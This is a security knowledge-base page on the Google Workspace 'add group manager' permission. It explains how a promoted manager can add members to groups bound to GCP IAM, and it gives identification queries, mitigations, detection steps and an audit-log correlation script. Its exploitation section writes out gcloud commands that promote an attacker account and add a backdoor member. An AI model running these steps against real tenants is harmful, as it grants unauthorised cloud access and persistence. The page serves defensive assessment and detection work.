# GWS\_ADD\_GROUP\_MANAGER

## Summary

|                                |                                                                                               |
| ------------------------------ | --------------------------------------------------------------------------------------------- |
| **FSProtect ACL Alias**        | GWS\_ADD\_GROUP\_MANAGER                                                                      |
| **GWS Alias**                  | Add Group Manager                                                                             |
| **Affected Object Types**      | GWS Group                                                                                     |
| **Exploitation Certainty**     | Certain                                                                                       |
| **Granting Roles / Positions** | Google Workspace **Super Admin**, **Groups Admin** (directory role), existing **Group Owner** |

## Description

`GWS_ADD_GROUP_MANAGER` represents the ability to add new managers to a Google Workspace Group. Granting the `MANAGER` role to an identity delegates partial administrative authority: a manager can add and remove group members, approve membership requests, and promote existing members to `MANAGER`. A manager cannot assign the `OWNER` role, delete the group, or modify group-level settings.

The security significance of this edge is the two-step escalation chain it enables: `GWS_ADD_GROUP_MANAGER` → `GWS_GROUP_MANAGER` → `GWS_ADD_GROUP_MEMBER` → GCP IAM access. After a controlled identity is promoted to manager, it independently gains the ability to add members to the group without requiring any further owner action. The entire chain from promotion to GCP IAM inheritance can complete in minutes with two API calls.

Manager accounts are frequently overlooked during security reviews because alert policies tend to focus on ownership changes. A manager foothold also persists through group ownership transfers — if the group's owner is rotated or remediated, existing manager assignments are not automatically revoked.

## Identification

### gcloud CLI

```bash
# Find all GCP-bound groups across the organization (primary target list)
gcloud asset search-all-iam-policies \
    --scope='organizations/ORG_ID' \
    --query='memberTypes:group' \
    --format="table(resource, policy.bindings[].role, policy.bindings[].members)"
```

```bash
# List current owners who can assign the MANAGER role
GROUP_EMAIL="target-group@example.com"
gcloud identity groups memberships list \
  --group-email=$GROUP_EMAIL \
  --format="table(preferredMemberKey.id, roles[0].name)" | grep -E "OWNER|MANAGER"
```

### Google Admin Console

1. Open **Google Admin Console** (`admin.google.com`) → **Directory** → **Groups**.
2. Click the target group → **Members**.
3. Filter by **Role: Owner** — these identities can assign the MANAGER role.
4. Check **Admin roles** → **Groups Admin** for directory-level admin identities.

## Exploitation

```bash
# Step 1: Promote controlled identity to MANAGER
GROUP_EMAIL="privileged-group@example.com"
gcloud identity groups memberships add \
  --group-email=$GROUP_EMAIL \
  --member-email=attacker@example.com \
  --roles=MANAGER

# Step 2: As the new manager, add a second controlled identity as MEMBER to inherit GCP IAM
gcloud identity groups memberships add \
  --group-email=$GROUP_EMAIL \
  --member-email=backdoor@example.com \
  --roles=MEMBER

# Wait 1-5 minutes for IAM propagation
gcloud projects list
```

## Mitigation

1. **Convert GCP-bound groups to security groups** — restricts all membership and role changes to Super Admins only:

   ```bash
   gcloud identity groups update GROUP_EMAIL \
     --labels=cloudidentity.googleapis.com/groups.security=''
   ```
2. **Minimize manager assignments** — assign the MANAGER role only when membership delegation is genuinely required. Audit and revoke unnecessary managers regularly.
3. **Restrict manager assignment to Super Admins only** via Google Admin Console → group settings → disable owner-delegated manager assignment.
4. **Alert on MANAGER role assignments** for groups with GCP IAM bindings, not just OWNER changes.

## Detection

Monitor group role changes in **Google Workspace Audit Logs**. The two-step chain (manager promotion → member addition) requires correlating two separate audit events, potentially across the `admin` and `groups_enterprise` streams.

### Google Admin Console

1. Open **Google Admin Console** (`admin.google.com`) → **Reporting** → **Audit and investigation** → **Groups Enterprise log events**.
2. Filter by **Event Name: Add member** or **Update member** where role = MANAGER.
3. For the same group, look for a subsequent **Add member** with role = MEMBER performed by the same identity (the exploitation chain indicator).

### Cloud Logging (GCP)

```bash
# Monitor MANAGER role assignments and all subsequent member additions
gcloud logging read \
  'logName="organizations/ORG_ID/logs/cloudaudit.googleapis.com%2Factivity" AND protoPayload.serviceName="admin.googleapis.com" AND (protoPayload.methodName="google.admin.AdminService.addGroupMember" OR protoPayload.methodName="google.admin.AdminService.updateGroupMember")' \
  --format="table(timestamp, protoPayload.authenticationInfo.principalEmail, protoPayload.request.groupKey, protoPayload.request.memberKey, protoPayload.request.role)"
```
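The Admin Console steps above and the `gcloud logging read` filter both leave the correlation to the analyst: a MANAGER grant is only the first half of the chain, and the indicator is the promoted identity itself adding a MEMBER to the same group afterwards. The following script is an added example (not FSProtect's own code) that performs that correlation over constructed Cloud Logging entries shaped like the ones the filter returns. It flags every MANAGER grant on a group in a GCP-bound watchlist (mitigation step 4) and, separately, the full two-step chain within a configurable window. The `request.groupKey` / `memberKey` / `role` field names are an assumption taken from the page's `--format` string, and the watchlist is a constructed stand-in for the output of `gcloud asset search-all-iam-policies --query='memberTypes:group'`.

```python
"""Correlate Workspace group-membership audit events into the
GWS_ADD_GROUP_MANAGER -> GWS_ADD_GROUP_MEMBER chain.

Added example, not FSProtect's code. Entries are constructed to mirror
Cloud Logging records (protoPayload.methodName, authenticationInfo,
request.groupKey/memberKey/role); the request field names are assumed.
"""
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample entries (not real audit data).
SAMPLE_ENTRIES: List[Dict] = [
    {"timestamp": "2024-05-01T10:00:00Z",
     "protoPayload": {"methodName": "google.admin.AdminService.updateGroupMember",
                      "authenticationInfo": {"principalEmail": "owner@example.com"},
                      "request": {"groupKey": "privileged-group@example.com",
                                  "memberKey": "alice@example.com",
                                  "role": "MANAGER"}}},
    {"timestamp": "2024-05-01T10:03:00Z",
     "protoPayload": {"methodName": "google.admin.AdminService.addGroupMember",
                      "authenticationInfo": {"principalEmail": "alice@example.com"},
                      "request": {"groupKey": "privileged-group@example.com",
                                  "memberKey": "newuser@example.com",
                                  "role": "MEMBER"}}},
    # Manager grant on a group with no GCP IAM bindings and no follow-up action.
    {"timestamp": "2024-05-01T11:00:00Z",
     "protoPayload": {"methodName": "google.admin.AdminService.addGroupMember",
                      "authenticationInfo": {"principalEmail": "owner@example.com"},
                      "request": {"groupKey": "social@example.com",
                                  "memberKey": "bob@example.com",
                                  "role": "MANAGER"}}},
    # Member addition by the owner, not by a freshly promoted manager.
    {"timestamp": "2024-05-01T12:00:00Z",
     "protoPayload": {"methodName": "google.admin.AdminService.addGroupMember",
                      "authenticationInfo": {"principalEmail": "owner@example.com"},
                      "request": {"groupKey": "privileged-group@example.com",
                                  "memberKey": "carol@example.com",
                                  "role": "MEMBER"}}},
]

# Constructed watchlist of groups that carry GCP IAM bindings; in practice,
# build it from `gcloud asset search-all-iam-policies --query='memberTypes:group'`.
GCP_BOUND_GROUPS = {"privileged-group@example.com"}

MEMBERSHIP_METHODS = {
    "google.admin.AdminService.addGroupMember",
    "google.admin.AdminService.updateGroupMember",
}


def _parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def normalize(entries: List[Dict]) -> List[Dict]:
    """Flatten protoPayload into (time, actor, group, member, role) records,
    dropping anything that is not a group membership change."""
    out = []
    for e in entries:
        p = e["protoPayload"]
        if p.get("methodName") not in MEMBERSHIP_METHODS:
            continue
        req = p.get("request", {})
        out.append({
            "time": _parse_ts(e["timestamp"]),
            "actor": p["authenticationInfo"]["principalEmail"],
            "group": req.get("groupKey"),
            "member": req.get("memberKey"),
            "role": req.get("role"),
        })
    return sorted(out, key=lambda r: r["time"])


def find_manager_grants(records: List[Dict], watchlist) -> List[Dict]:
    """Every MANAGER grant on a GCP-bound group is a finding on its own."""
    return [r for r in records if r["role"] == "MANAGER" and r["group"] in watchlist]


def find_escalation_chains(records: List[Dict], window=timedelta(hours=24)):
    """Chain indicator: X is granted MANAGER on group G, then X itself adds a
    MEMBER to G within `window`. Returns (grant, addition) pairs."""
    chains = []
    for g in (r for r in records if r["role"] == "MANAGER"):
        for a in records:
            if (a["role"] == "MEMBER" and a["group"] == g["group"]
                    and a["actor"] == g["member"]
                    and g["time"] <= a["time"] <= g["time"] + window):
                chains.append((g, a))
    return chains


if __name__ == "__main__":
    recs = normalize(SAMPLE_ENTRIES)
    for g in find_manager_grants(recs, GCP_BOUND_GROUPS):
        print(f"[manager grant] {g['actor']} made {g['member']} MANAGER of {g['group']}")
    for g, a in find_escalation_chains(recs):
        print(f"[chain] {g['member']} promoted by {g['actor']} on {g['group']}, "
              f"then added {a['member']} as MEMBER {a['time'] - g['time']} later")
```

Run against the sample data, the script reports one watchlist manager grant (alice on `privileged-group@example.com`) and one complete chain (alice adding `newuser@example.com` three minutes later); the owner's own member addition and the promotion on the non-GCP-bound group produce nothing. Keying the second event on the promoted identity rather than on the group alone is what keeps owner-driven membership churn out of the alert.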

## References

* <https://www.netspi.com/blog/technical-blog/cloud-pentesting/escalating-privileges-in-google-cloud-via-open-groups/>
* <https://cloud.google.com/iam/docs/groups-in-cloud-console>
* <https://developers.google.com/admin-sdk/directory/reference/rest/v1/members/insert>
* <https://cloud.google.com/identity/docs/reference/rest/v1/groups.memberships>
* <https://cloud.google.com/security-command-center/docs/concepts-event-threat-detection-overview>
* <https://support.google.com/a/answer/167430>
